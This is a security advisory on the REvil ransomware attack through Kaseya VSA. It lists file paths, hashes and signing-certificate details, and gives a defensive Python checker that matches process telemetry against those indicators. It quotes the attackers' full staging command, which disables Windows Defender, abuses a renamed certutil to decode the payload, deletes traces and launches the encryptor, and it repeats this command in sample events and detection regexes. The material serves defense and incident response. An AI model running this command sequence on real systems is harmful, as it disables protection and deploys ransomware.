Kaseya VSA Users Under Ransomware Attack. Kaseya is urging MSPs to shut down on-premises VSA servers immediately.
We have become aware of an urgent ransomware incident in progress affecting Kaseya VSA. The only way to prevent compromise is to block Kaseya VSA, whether you use the cloud service or run the solution on-premises. Kaseya is currently pushing a hotfix for this issue.
Kaseya provides IT management software to MSPs.
According to security researchers, a ransomware encryptor is being dropped to c:\kworking\agent.exe. The malicious VSA procedure is being deployed under the name “Kaseya VSA Agent Hot-fix”, and at least two tasks are running:
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The encryptor binary is digitally signed with a valid signature carrying this information:
Name: PB03 TRANSPORT LTD.
Issuer: CN = Sectigo RSA Code Signing CA, O = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
Serial #: 119acead668bad57a48b4f42f294f8f0
When the executable runs, these files are being dropped into the hardcoded path c:\Windows:
- MsMpEng.exe: named to impersonate the Windows Defender executable and hide the encryption process. (The legitimate executable usually runs from Program Files.)
- MsMpEng.exe hash: SHA-256 33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A
- Mpsvc.dll hash: SHA-256 8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD
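As an added example (not part of the advisory or of Kaseya's tooling), the Python checker below turns the indicators above into detection rules over process-creation telemetry: the Set-MpPreference tampering, the renamed certutil -decode step, the c:\kworking\agent.* staging path, MsMpEng.exe running outside Program Files, and the two quoted SHA-256 values. The event dict schema ('image', 'cmdline', 'sha256') and the sample events are constructed for the example, not a real log format.

```python
import re
from pathlib import PureWindowsPath

# SHA-256 values quoted in the advisory, keyed for lookup (uppercase hex).
KNOWN_HASHES = {
    "33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A": "MsMpEng.exe",
    "8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD": "mpsvc.dll",
}
# Patterns derived from the staging command line quoted in the advisory.
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|ScriptScanning)", re.I)
CERTUTIL_DECODE = re.compile(r"\bcert(util)?\.exe\b.*\s-decode\s", re.I)
KWORKING_AGENT = re.compile(r"c:\\kworking\\agent\.(exe|crt)", re.I)

def analyze_event(event):
    """Return findings for one event dict with 'image', 'cmdline', 'sha256' (assumed schema)."""
    findings = []
    cmdline = event.get("cmdline", "")
    image = PureWindowsPath(event.get("image", ""))
    if DEFENDER_TAMPER.search(cmdline):
        findings.append("defender-tamper")
    if CERTUTIL_DECODE.search(cmdline):
        findings.append("certutil-decode")
    if KWORKING_AGENT.search(cmdline) or KWORKING_AGENT.search(str(image)):
        findings.append("kworking-agent-path")
    # The real MsMpEng.exe runs from Program Files; the dropped copy sits in C:\Windows.
    if image.name.lower() == "msmpeng.exe" and "program files" not in str(image).lower():
        findings.append("msmpeng-outside-program-files")
    label = KNOWN_HASHES.get(event.get("sha256", "").upper())
    if label:
        findings.append("known-hash:" + label)
    return findings

# Constructed sample telemetry: the staging command, the dropped binary, a benign Defender process.
SAMPLE_EVENTS = [
    {"image": r"C:\WINDOWS\system32\cmd.exe", "sha256": "CONSTRUCTED-NOT-A-REAL-HASH",
     "cmdline": r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
                r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -Force & "
                r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
                r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe"},
    {"image": r"C:\Windows\MsMpEng.exe", "cmdline": r"C:\Windows\MsMpEng.exe",
     "sha256": "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a"},
    {"image": r"C:\Program Files\Windows Defender\MsMpEng.exe", "sha256": "CONSTRUCTED-NOT-A-REAL-HASH",
     "cmdline": r'"C:\Program Files\Windows Defender\MsMpEng.exe"'},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["image"], "->", analyze_event(event) or "clean")
```

Each rule fires independently, so a partial match (for example only the Defender tampering) still surfaces; the hash rule is the weakest because a re-signed or rebuilt binary changes it.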
Other files involved:
Additional information added 4:25 CT, Fri, Jul 2:
VSA user admin accounts are being disabled just moments before ransomware is being deployed. VSA security notifications indicated the “KEleveted######” account, which is an SQL user, performed this action. Evidence likely points to execution via SQL commands.
Digital Signature used by ransomware operators:
Name: PB03 TRANSPORT LTD.
Issuer: Sectigo RSA Code Signing CA
Serial Number: 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0
To block VSA communications at the firewall, use Kaseya’s Cloud Addresses and Ports listing.
Based on forensic investigations of the intrusion, there are strong connections to the REvil ransomware group or affiliates. REvil has targeted at least 6 large MSPs through the supply-chain attack on Kaseya’s VSA servers.
Kaseya released this statement in regards to the VSA service: “We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution but we recommend that you IMMEDIATELY shut down your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA.”